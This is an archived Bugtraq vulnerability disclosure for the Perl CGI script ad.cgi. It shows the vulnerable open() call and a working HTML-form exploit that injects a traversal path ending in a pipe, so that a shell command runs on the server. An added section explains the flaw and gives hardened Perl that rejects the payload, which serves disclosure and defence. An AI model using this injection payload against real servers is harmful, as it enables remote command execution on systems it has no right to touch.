[18021] in bugtraq
Insecure input validation in ad.cgi
daemon@ATHENA.MIT.EDU (rpc)
Tue Dec 12 15:32:57 2000
Message-ID: <20001211230824.C5CC524C629@lists.securityfocus.com>
Date: Mon, 11 Dec 2000 15:10:22 GMT
Reply-To: rpc <h@ckz.org>
From: rpc <h@ckz.org>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation
vulnerability.
Information on ad.cgi is available at:
http://www.conservatives.net/atheist/scripts/index.html?ads
----code snippet----
$filename = "$FORM{'file'}";
$datafile = "$basedir" . "$filename";
...
open (INFO, "$datafile");
-----------------
Exploit:
<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c
5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
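
The two-argument open() in the snippet above treats a trailing "|" in its argument as a request to run a command, and the unchecked "file" value also permits "../" traversal out of $basedir. The following is an added example, not part of the original post or of ad.cgi, showing one way to handle the parameter safely. The helper name open_ad_file(), the temporary $basedir and the sample file name are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: hardened handling of the 'file' form parameter.
# open_ad_file(), the temp $basedir and 'banner1.txt' are hypothetical.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);
use Cwd qw(realpath);

# Constructed stand-in for the script's data directory, with one sample file.
my $basedir = realpath(tempdir(CLEANUP => 1));
open(my $seed, '>', File::Spec->catfile($basedir, 'banner1.txt')) or die "seed: $!";
print {$seed} "sample ad\n";
close($seed);

# Returns a read-only filehandle, or undef if the name is rejected.
sub open_ad_file {
    my ($base, $name) = @_;
    return unless defined $name;

    # 1. Allowlist: a plain file name only. No '/', no leading '.',
    #    no '|', whitespace or NUL, so no path component can be '..'.
    return unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;

    # 2. Resolve symlinks and confirm the result is still under $base.
    my $path = realpath(File::Spec->catfile($base, $name));
    return unless defined $path && index($path, "$base/") == 0;

    # 3. Three-argument open with an explicit '<' mode: the path is never
    #    scanned for a leading or trailing '|', so it cannot start a command.
    open(my $fh, '<', $path) or return;
    return $fh;
}

# Constructed inputs: one legitimate name, then the value from the post.
for my $input ('banner1.txt',
               '../../../../../../../../bin/ping -c 5 www.foo.com|') {
    my $fh = open_ad_file($basedir, $input);
    printf "%-55s %s\n", "'$input'", $fh ? 'opened read-only' : 'rejected';
    close($fh) if $fh;
}
```

Either check alone closes the hole shown in the post; using both keeps the script safe if one is later loosened.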